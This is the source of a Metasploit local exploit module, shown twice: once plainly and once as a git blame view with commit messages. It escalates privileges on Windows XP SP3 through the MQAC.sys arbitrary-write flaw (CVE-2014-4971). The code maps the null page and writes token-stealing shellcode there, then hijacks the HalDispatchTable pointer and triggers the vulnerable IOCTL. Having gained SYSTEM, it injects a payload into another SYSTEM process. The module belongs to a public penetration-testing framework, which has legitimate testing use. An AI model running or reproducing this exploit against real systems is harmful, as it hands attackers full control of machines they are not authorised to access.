modules/exploits/windows/local/mqac_write.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
        'Description' => %q{
          A vulnerability within the MQAC.sys module allows an attacker to
          overwrite an arbitrary location in kernel memory.

          This module will elevate itself to SYSTEM, then inject the payload
          into another SYSTEM process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt Bergin', # original exploit and all the hard work
          'Spencer McIntyre' # MSF module
        ],
        'Arch' => [ARCH_X86],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Targets' => [
          [
            'Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS' => "\x44",
              '_TOKEN' => "\xc8",
              '_UPID' => "\x84",
              '_APLINKS' => "\x88"
            }
          ]
        ],
        'References' => [
          ['CVE', '2014-4971'],
          ['EDB', '34112'],
          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
        ],
        'DisclosureDate' => '2014-07-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_OS_RESTARTS, ]
        },
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_process_attach
              stdapi_sys_process_getpid
              stdapi_sys_process_memory_write
            ]
          }
        }
      )
    )
  end

  # Function borrowed from smart_hashdump
  def get_system_proc
    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
    local_sys = resolve_sid('S-1-5-18')
    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"

    this_pid = session.sys.process.getpid
    # Processes that can Blue Screen a host if migrated in to
    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
    session.sys.process.processes.each do |p|
      # Check we are not migrating to a process that can BSOD the host
      next if dangerous_processes.include?(p['name'])
      next if p['pid'] == this_pid
      next if p['pid'] == 4
      next if p['user'] != system_account_name

      return p
    end
  end

  def check
    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      print_error('MSMQ installation not found')
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)

    version = get_version_info
    if version.build_number == Msf::WindowsVersion::XP_SP3
      return Exploit::CheckCode::Appears
    elsif version.xp_or_2003? && !version.windows_server?
      vprint_error('Unsupported version of Windows XP detected')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    if sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
    end

    if is_system?
      print_error('This meterpreter session is already running as SYSTEM')
      return
    end

    # Running on Windows XP versions that aren't listed in the supported list
    # results in a BSOD and so we should not let that happen.
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system')
    end

    base_addr = 0xffff
    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return if handle.nil?

    this_proc = session.sys.process.open
    unless this_proc.memory.writable?(base_addr)
      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
                                                    [0xffff].pack('V'),
                                                    'MEM_COMMIT|MEM_RESERVE',
                                                    'PAGE_EXECUTE_READWRITE')
    end
    unless this_proc.memory.writable?(base_addr)
      print_error('Failed to properly allocate memory')
      this_proc.close
      return
    end

    haldispatchtable = find_haldispatchtable
    return if haldispatchtable.nil?

    print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']

    restore_ptrs = "\x31\xc0" # xor eax, eax
    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
    restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')          # mov dword ptr [nt!HalDispatchTable+0x4], eax

    shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)

    this_proc.memory.write(0x1, shellcode)
    this_proc.close

    print_status('Triggering vulnerable IOCTL')
    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
                                                1, 0x258,
                                                haldispatchtable + 4, 0)
    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    unless is_system?
      print_error('Did not get system, exploit failed')
      return
    end

    proc = get_system_proc
    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
    unless execute_shellcode(payload.encoded, nil, proc['pid'])
      fail_with(Failure::Unknown, 'Error while executing the payload')
    end
  end
end
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Local`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`Rank = AverageRanking`

Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`include Msf::Exploit::Local::WindowsKernel`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`include Msf::Post::Windows::Priv`
Fix a typo and use the execute_shellcode function 2014-07-22 13:06:57 -04:00			`include Msf::Post::Windows::Process`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`def initialize(info = {})`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',`
			`'Description' => %q{`
			`A vulnerability within the MQAC.sys module allows an attacker to`
			`overwrite an arbitrary location in kernel memory.`

			`This module will elevate itself to SYSTEM, then inject the payload`
			`into another SYSTEM process.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`'Matt Bergin', # original exploit and all the hard work`
			`'Spencer McIntyre' # MSF module`
			`],`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Arch' => [ARCH_X86],`
			`'Platform' => ['win'],`
			`'SessionTypes' => ['meterpreter'],`
			`'DefaultOptions' => {`
			`'EXITFUNC' => 'thread'`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`},`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'Targets' => [`
			`[`
			`'Windows XP SP3',`
			`{`
			`'HaliQuerySystemInfo' => 0x16bba,`
			`'_KPROCESS' => "\x44",`
			`'_TOKEN' => "\xc8",`
			`'_UPID' => "\x84",`
			`'_APLINKS' => "\x88"`
			`}`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`]`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`],`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'References' => [`
Solve conflicts 2014-08-28 10:19:12 -05:00			`['CVE', '2014-4971'],`
			`['EDB', '34112'],`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`],`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`'DisclosureDate' => '2014-07-22',`
			`'DefaultTarget' => 0,`
			`'Notes' => {`
Added module for Windows version comparisons 2023-05-25 12:45:30 +10:00			`'Stability' => [ CRASH_OS_RESTARTS, ]`
Specify meterpreter compatibility command requirements 2021-09-08 21:56:02 +01:00			`},`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`stdapi_railgun_api`
			`stdapi_sys_process_attach`
			`stdapi_sys_process_getpid`
			`stdapi_sys_process_memory_write`
			`]`
			`}`
Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00			`}`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`)`
			`)`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`

			`# Function borrowed from smart_hashdump`
			`def get_system_proc`
			`# Make sure you got the correct SYSTEM Account Name no matter the OS Language`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`local_sys = resolve_sid('S-1-5-18')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"`

Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_pid = session.sys.process.getpid`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`# Processes that can Blue Screen a host if migrated in to`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`session.sys.process.processes.each do \|p\|`
			`# Check we are not migrating to a process that can BSOD the host`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`next if dangerous_processes.include?(p['name'])`
			`next if p['pid'] == this_pid`
			`next if p['pid'] == 4`
			`next if p['user'] != system_account_name`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return p`
			`end`
			`end`

Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`def check`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE\|FILE_SHARE_READ', 0, 'OPEN_EXISTING')`
			`if handle.nil?`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_error('MSMQ installation not found')`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`return Exploit::CheckCode::Safe`
			`end`
			`session.railgun.kernel32.CloseHandle(handle)`

Added module for Windows version comparisons 2023-05-25 12:45:30 +10:00			`version = get_version_info`
			`if version.build_number == Msf::WindowsVersion::XP_SP3`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`return Exploit::CheckCode::Appears`
Added module for Windows version comparisons 2023-05-25 12:45:30 +10:00			`elsif version.xp_or_2003? && !version.windows_server?`
Update local exploit checks to follow the guidelines. 2015-09-01 23:26:45 -05:00			`vprint_error('Unsupported version of Windows XP detected')`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`def exploit`
More platform/arch/session fixes 2016-10-29 08:11:20 +10:00			`if sysinfo['Architecture'] == ARCH_X64`
			`fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`

			`if is_system?`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_error('This meterpreter session is already running as SYSTEM')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`# Running on Windows XP versions that aren't listed in the supported list`
			`# results in a BSOD and so we should not let that happen.`
Fix modules broken by @wchen-r7 's `4275a65407` commit. 2016-07-05 11:42:03 +02:00			`if check == Exploit::CheckCode::Safe`
Added module for Windows version comparisons 2023-05-25 12:45:30 +10:00			`fail_with(Failure::NotVulnerable, 'Exploit not available on this system')`
Fix modules broken by @wchen-r7 's `4275a65407` commit. 2016-07-05 11:42:03 +02:00			`end`
Add some small fixes to the MQAC local exploit 2014-07-24 14:44:26 +10:00
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`base_addr = 0xffff`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE\|FILE_SHARE_READ', 0, 'OPEN_EXISTING')`
			`return if handle.nil?`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc = session.sys.process.open`
			`unless this_proc.memory.writable?(base_addr)`
Moar bad packs 2014-08-15 21:11:37 +01:00			`session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,`
			`[0xffff].pack('V'),`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'MEM_COMMIT\|MEM_RESERVE',`
			`'PAGE_EXECUTE_READWRITE')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`unless this_proc.memory.writable?(base_addr)`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`print_error('Failed to properly allocate memory')`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc.close`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`haldispatchtable = find_haldispatchtable`
			`return if haldispatchtable.nil?`
Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")`

			`vprint_status('Getting the hal.dll base address...')`
			`hal_info = find_sys_base('hal.dll')`
			`fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?`
			`hal_base = hal_info[0]`
			`vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")`
			`hali_query_system_information = hal_base + target['HaliQuerySystemInfo']`

Run Rubocop layout rules on modules 2021-08-27 17:15:33 +01:00			`restore_ptrs = "\x31\xc0" # xor eax, eax`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation`
			`restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax`

			`shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)`
Solve conflicts 2014-08-28 10:19:12 -05:00
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`this_proc.memory.write(0x1, shellcode)`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc.close`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_status('Triggering vulnerable IOCTL')`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,`
			`1, 0x258,`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`haldispatchtable + 4, 0)`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`unless is_system?`
Minor caps, grammar, desc fixes 2014-08-18 13:35:34 -05:00			`print_error('Did not get system, exploit failed')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

Fix a typo and use the execute_shellcode function 2014-07-22 13:06:57 -04:00			`proc = get_system_proc`
			`print_status("Injecting the payload into SYSTEM process: #{proc['name']}")`
			`unless execute_shellcode(payload.encoded, nil, proc['pid'])`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`fail_with(Failure::Unknown, 'Error while executing the payload')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`
			`end`
			`end`